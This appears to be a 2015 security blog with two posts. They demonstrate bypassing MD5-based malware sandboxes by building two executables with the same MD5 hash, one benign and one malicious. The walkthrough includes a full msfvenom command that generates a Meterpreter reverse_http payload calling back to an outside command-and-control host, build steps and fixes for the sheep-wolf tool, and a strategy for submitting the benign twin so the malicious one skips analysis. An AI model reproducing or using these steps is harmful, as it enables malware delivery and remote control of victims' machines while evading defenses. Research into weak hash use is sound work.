Daniele Bellavista's Blog

Security, IT, Projects

Sandbox solution bypass: don’t use MD5! A pratical example — 2015-08-03

Sandbox solution bypass: don’t use MD5! A pratical example

In the previous post, I described how an MD5-based sandbox solution can be fooled and how to build two different python programs with the same MD5.

Now, we will use the SilentSignal team’s sheep-wolf tool to build two different executable having the same MD5. The file sheep.exe will simply exit, while wolf.exe will execute a metrerpreter shellcode.

The approach used by SilentSignal is a bit different from the approach I described, and, while it requires some more code, it can be easily automated. They used the broken CRC approach; the shellcode is locally encrypted with a symmetric key and the CRC value is computed:

C = RSA(S, K)
V = CRC(S)

where S is the shellcode,
K is the symmetric key,
C is the encrypted shellcode and
CRC is a generic cyclic redundancy check function

When you have to decrypt the shellcode, you can verify that the key was correct if the CRC value is equal:

S' = RSA(C, K)
V' = CRC(V)
if V == V' then EXECUTE(S') else EXIT()

In order to produce the “evil/good” behavior, you have to break the CRC in sheep.exe and leave it intact in wolf.exe. The sheep-wolf tool does it by performing a cyclic xor on the key K.

B1 = "AAAAAAAA...."
B2 = "AAAAAAAA...."

K' = K ^ B1 ^ B2
S' = RSA(C, K')
V' = CRC(V)
if V == V' then EXECUTE(S') else EXIT()

As long as B1 == B2, then shellcode will be executed. So, now we introduce the collision blocks CBX and CBY, such that CBX != CBY and MD5(CBX) == MD5(CBY) , creating sheep.exe and wolf.exe

// Sheep.exe
B1 = CBX
B2 = CBY

K' = K ^ B1 ^ B2
S' = RSA(C, K')
V' = CRC(V)
if V == V' then EXECUTE(S') else EXIT()
// Wolf.exe
B1 = CBX
B2 = CBX

K' = K ^ B1 ^ B2
S' = RSA(C, K')
V' = CRC(V)
if V == V' then EXECUTE(S') else EXIT()

Sheep, having B1 != B2 will not execute the shellcode, while wolf will! And the resulting program will have the same MD5 as long as the physical position of B1 is aligned to 64 byte (which is the MD5 block size).

Now that we have understood the sheep-wold approach, we can use it to create some meaningful proof of concept.


  • Metasploit Framework
  • Windows 7/8.1 with Visual Studio Express and Windows SDK
  • Windows console with msbuild.exe in PATH


  • git clone https://github.com/silentsignal/sheep-wolf
  • Open the sheep solution with Visual Studio
  • Compile the shepherd project
  • Generate the malicious payload: msfvenom -p windows/meterpreter/reverse_http -b ‘\x00’ -o shellcode.raw -f raw LHOST=my-own-cnc.lol LPORT=80
  • Move shellcode.raw into sheep-wolf/
  • Download https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip and extract fastcoll into sheep-wolf/fastcoll/fastcoll.exe
  • Inside the Windows Prompt execute .\shepherd.bat PASSWORD shellcode.raw
  • When the script is terminated, sheep.exe and wolf.exe will be inside the directory evilize/

Now I actually ran in some problems. Maybe it was my version of Visual Studio, but I had to make two edits:

  • evilize.c line 259: the offset between the first dummy block and the second is hardcoded to 200 bytes. However in my compilation, the difference is actually 208, so I had to change the 200 in 208 and recompile evilize (using Mingw + cygwin).
  • shepherd/shepherd.cpp line 34: the shellcode file is opened with the default flags. However, in order to make it work with my shellcode, I had to open the shellcode with:  std::ifstream in(argv[2], std::ios::binary); Then I recompiled the shepherd project from Visual Studio.

To test it, I first tried to launch sheep.exe


And sheep exits after checking the CRC.

Then wolf.exe. As you can see, the shellcode is executed and my Kali received the connection from meterpreter!



Conclusion: do not use MD5!

Sandbox solution bypass: don’t use MD5! — 2015-07-27

Sandbox solution bypass: don’t use MD5!

Sandboxes are terrific tools for malware protection. They allow to analyze executables and documents, looking for threats unknown to antivirus products.

Thus, one of the main objective of malware writers is to bypass sandboxes by exhibiting malicious behaviors only when infecting the targets. But the eternal fight between malware writer versus sandbox writers to write respectively bypass and anti-bypass solution can end very quickly if the sandbox manager uses MD5 as unique file identifier. The first improvement of an automated Sandbox solution is to not re-analyze already known files (according to certain temporal policies maybe), so if you analyzed the program P identified with HASH(P), when a new program P’ arrives with HASH(P’) == HASH(P), then you can assume that P’ == P, right?

Statistically you can make that assumption, but if HASH is MD5, then you must know that writing two different files having the same MD5 hash value is very, very, very easy. As explained in HashClash, the generation of Chosen-prefix Collisions is very efficient, so one could write a program with the same prefix but different body. I’m not saying you can generate two completely different programs and append some magic suffix that make them identical in a reasonable period of time, but you can generate two different collision blocks that differs for a few bytes but have the same MD5.

Let’s assume we can create two collision blocks and embed them (in the correct position) inside a program data:

#include <stdio.h>

char pillData[] = "000000000000000000000"
                  /** ... **/
                  /** Collision Blocks **/
                  /** ... **/

int main() {
  if (pillData[666] !== 0x43) {
    // Do something evil
  } else {
    // Do something good

Let’s name the collision blocks A and A’, such that MD5(A) == MD5(A’), and A[J] == 0x43, A'[J] != 0x43. If we can embed them into pillData such that pillData[666] == 0x43 and pillData'[666] != 0x43 then the program with the A block will have a good behavior, while the program with the A’ code will have a bad behavior! (Note that the code is the same, the only difference between the two program is the value of pillData[666].)

Before approaching the binary world, I want to give a demonstration using an interpreted language. First download e compile fastcoll:

git clone https://github.com/upbit/clone-fastcoll
cd clone-fastcoll

Then write the beginning of a Python program:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-

pill = """

Execute fastcoll and verify that the two generated files (md5_data1 and md5_data2) are different and have the same MD5.

./fastcoll ./test.py
md5sum ./md5_data*
diff md5_data*
sha256sum md5_data*

Now we can modify each file introducing the malicious and legal code:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-

pill = """

if ord(pill[idx]) == val:
  print "Malicious!"
  print "Legal!"

Where idxis the index such that md5_data1.pill[idx] == val != md5_data2.pill[idx] . You can download two sample files here: https://www.dropbox.com/s/457e88q0s52kdl3/md5_collision.zip?dl=0 .

Now that we have the malicious and legal code with same MD5, we can bypass the target sandbox solution by sending the legal program first. Once it has been analyzed, we send the malicious code that, having the same MD5, won’t be analyzed at all.

My example of course was only a PoC, with few applications. In the next post we will analyze the SilentSignal’s sheep-wolf tool to create two real executable files: one .exe that spawn a meterpreter and one .exe that does nothing.